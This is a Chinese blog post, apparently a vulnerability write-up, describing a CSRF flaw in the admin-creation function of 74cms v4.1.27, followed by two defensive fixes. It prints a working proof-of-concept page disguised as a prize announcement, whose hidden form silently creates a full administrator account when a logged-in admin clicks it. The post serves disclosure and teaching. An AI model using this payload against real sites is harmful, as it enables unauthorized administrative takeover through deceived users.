74cms CSRF漏洞可以诱骗添加管理员

注:本文章只是简单的发现了74cms[骑士cms] v4.1.27添加管理员时产生的CSRF漏洞


1.正常情况下,管理员会登录后,进入到【系统】-【网络管理员】-【添加管理员】中,进行添加管理员。



填写好相关数据后,管理员正常进行添加。然后我们看看抓取到的数据


然后我尝试伪造一个假页面,内容如下:

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>恭喜你中奖啦</title>
</head>
  <body>
	<img src="img/bonus.jpg"/>
	    <form action="http://www.a.com/cms/index.php?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
        <input type="hidden" name="username" value="test_hi">
        <input type="hidden" name="email" value="test@test.com">
        <input type="hidden" name="password" value="admin">
        <input type="hidden" name="repassword" value="admin">
        <input type="hidden" name="role_id" value="1">
        <input type="hidden" name="submit3" value="添加">
		<button type="submit" value="Submit">进入领取</button>
      </form>
  </body>
</html>
显示效果如下图:


然后我们诱骗真实的管理员在登录后,去访问这个页面。

当管理员点击进入领取时,直接就执行了操作,因此实现了一个简单的CSRF的攻击。


然后我们可以看到在管理员那一栏目,新增了一个“test_hi”的管理员,密码由伪造者设置[演示中是admin],如果真正的管理员没有及时发现,那么此账号“test_hi”就可以利用。


尝试登录后,就可以看到,登录成功。


我所想到的防御:

1.在添加管理时检测相关参数和页面来源[Referer]

2.由于管理员权限较高,因此在添加时建议强制要求管理员输入自己的密码进行确认。


本文只是讲解了74CMS的一个小问题,文章写得不足不到之处,欢迎大家批评指正。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值